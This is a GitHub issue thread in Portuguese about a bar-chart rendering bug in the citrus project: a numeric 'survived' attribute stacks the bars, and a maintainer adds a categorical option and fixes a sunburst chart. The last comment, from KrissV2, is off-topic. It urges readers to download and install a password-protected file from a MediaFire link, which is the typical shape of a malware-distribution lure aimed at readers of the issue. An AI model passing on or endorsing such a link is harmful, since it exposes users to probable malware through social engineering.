### ISSUE TITLE
Versão dev - gráficos de barras com dois atributos em X

### ISSUE THREAD

**Issue by educsantos** [eubr-bigsea/citrus#426]
Usando uma base do Titanic (base 692) com os atributos categóricos:

- sex, com os valores literais "male" e "female" e
- survived, com os valores numéricos 0 ou 1,

O resultado plotado varia conforme a ordem desses atributos em X:

Fluxo 603: 
![image](https://github.com/user-attachments/assets/2bd52f74-77fb-4198-b808-709f98d01cbd)

Fluxo 549:
![image](https://github.com/user-attachments/assets/970811b2-3c20-4532-a2e0-2963ff6612fb)

Quando o primeiro atributo em X é o survived (com valores numéricos), o gráfico plotado é como se espera, com sex identificado pela legenda.

Quando o survived é deixado como o segundo atributo na configuração de X, o gráfico plotado é de barras empilhadas, ainda que o tipo do gráfico não é alterado. Na legenda aparece, então uma paleta de gradiente de cores.

=============================================
Testando com uma outra base que contém versão literal para os dois atributos, estava dando erro direto. Não está sendo possível rodar neste momento em que o ambiente está em testes.

Essa outra base é a 731 e o fluxo tentando usá-la é o 670.

**Comment by waltersf** [comment]
O resultado está certo, pois não há como a biblioteca de gráfico saber que survived, que está registrado como integer, seja usado como categoria. Mas sei que do ponto de vista do curso, está errado. O que vou fazer é adicionar um novo parâmetro para o atributo onde o usuário poderá especificar que quer trabalhar com ele como um tipo categórico.

**Comment by waltersf** [comment]
Foi adicionada uma opção quando você usa um atributo que seja numérico. Se marcá-lo, o gráfico irá se comportar como você planejou.

![image](https://github.com/user-attachments/assets/166a8467-b050-4bd3-832a-22eb5494671f)

**Comment by waltersf** [comment]
Sobre o problema com o gráfico do fluxo 670, é outro caso (não está funcionando o sunburst). Para facilitar o controle, abra uma issue para cada problema na próxima vez.

**Comment by waltersf** [comment]
Gráfico do tipo sunburst corrigido também. Se tudo estiver ok, gentileza fechar a issue, @educsantos

**Comment by educsantos** [comment]
Está OK agora. O novo recurso também funcionou bem.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
